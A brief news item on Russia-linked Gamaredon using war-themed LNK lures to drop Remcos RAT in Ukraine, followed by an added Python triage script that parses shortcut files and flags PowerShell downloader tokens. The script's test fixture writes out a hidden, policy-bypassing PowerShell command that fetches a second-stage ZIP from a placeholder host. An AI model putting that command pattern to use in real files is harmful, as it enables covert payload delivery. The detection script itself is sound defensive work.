Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in Ukraine
Briefly

A phishing campaign targeting Ukrainian entities has been discovered that delivers the remote access trojan Remcos RAT. Researchers attribute it to the Russian hacking group Gamaredon, which has conducted espionage against Ukraine since at least 2013. The lures are Windows shortcut (LNK) files disguised as Microsoft Office documents related to the Russo-Ukrainian war; when opened, they run PowerShell code that downloads the backdoor from geo-fenced servers in Russia and Germany.
The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to download the second stage ZIP file containing the Remcos backdoor.
The latest campaign is characterized by the distribution of Windows shortcut (LNK) files compressed inside ZIP archives, disguising them as Microsoft Office documents related to the ongoing Russo-Ukrainian war.
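As an added example (not code from The Hacker News article or from the researchers who reported the campaign), the following Python script shows how an analyst could triage a ZIP attachment of the kind described above: it lists the LNK entries, flags document-style double extensions such as `.docx.lnk`, parses the Shell Link header and StringData fields (MS-SHLLINK layout) to recover the target path and command-line arguments, and matches common PowerShell launcher and downloader tokens. The sample archive and both shortcut files are constructed inside the script; the file names, paths and URL are invented placeholders, not indicators from the campaign.

```python
import io
import re
import struct
import zipfile

# Shell Link header: HeaderSize (0x4C) followed by the fixed LinkCLSID
# 00021401-0000-0000-C000-000000000046, as laid out in MS-SHLLINK.
LNK_MAGIC = struct.pack("<I", 0x4C) + bytes.fromhex("0114020000000000C000000000000046")

# LinkFlags bits that decide which structures follow the 76-byte header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80

# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# A .lnk whose name also carries a document extension (e.g. report.docx.lnk).
DOC_DOUBLE_EXT = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|rtf|txt)\.lnk$", re.I)

# PowerShell launcher / downloader tokens commonly found in LNK targets and arguments.
PS_INDICATORS = re.compile(
    r"powershell|pwsh|-enc(odedcommand)?\b|-nop\b|-w(indowstyle)?\s+hidden|bypass"
    r"|downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biwr\b|\biex\b"
    r"|net\.webclient|expand-archive", re.I)


def parse_lnk(data):
    """Return the StringData fields of a Shell Link as a dict (ExtraData is ignored)."""
    if data[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (u16) then IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize (u32) includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


def triage_zip(zip_bytes):
    """Flag LNK entries that look like document lures or launch PowerShell."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            reasons, fields = [], {}
            if DOC_DOUBLE_EXT.search(info.filename):
                reasons.append("document-style double extension")
            try:
                fields = parse_lnk(zf.read(info))
            except (ValueError, struct.error):
                reasons.append("unparseable Shell Link header")
            text = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
            hits = list(dict.fromkeys(m.group(0).lower() for m in PS_INDICATORS.finditer(text)))
            if hits:
                reasons.append("PowerShell indicators: " + ", ".join(hits))
            if reasons:
                findings.append({"entry": info.filename, "fields": fields,
                                 "indicators": hits, "reasons": reasons})
    return findings


def build_lnk(relative_path, working_dir, arguments):
    """Construct a minimal Unicode Shell Link as a test fixture (not a real campaign sample)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = bytearray(0x4C)
    header[:20] = LNK_MAGIC
    struct.pack_into("<I", header, 0x14, flags)
    struct.pack_into("<I", header, 0x3C, 7)       # ShowCommand = SW_SHOWMINNOACTIVE
    body = struct.pack("<H", 2) + b"\x00\x00"      # empty IDList: size 2, then TerminalID
    for s in (relative_path, working_dir, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return bytes(header) + body + struct.pack("<I", 0)   # ExtraData TerminalBlock


def build_sample_zip():
    """Constructed archive: one lure-style LNK, one benign LNK, one text file (all invented)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Mobilisation_list.docx.lnk", build_lnk(
            r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"%TEMP%",
            '-w hidden -nop -ep bypass -c "iwr http://example.invalid/stage2.zip -OutFile $env:TEMP\\s.zip"'))
        zf.writestr("notes.lnk", build_lnk(r"..\notes.txt", r"%USERPROFILE%", ""))
        zf.writestr("readme.txt", b"benign text")
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        print(f["entry"], "->", "; ".join(f["reasons"]))
```

Only the lure entry is reported; the benign shortcut pointing at a text file produces no finding. In practice the parsed target and arguments are what an analyst pivots on next: the download URL and the second-stage archive name it fetches.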
Read at The Hacker News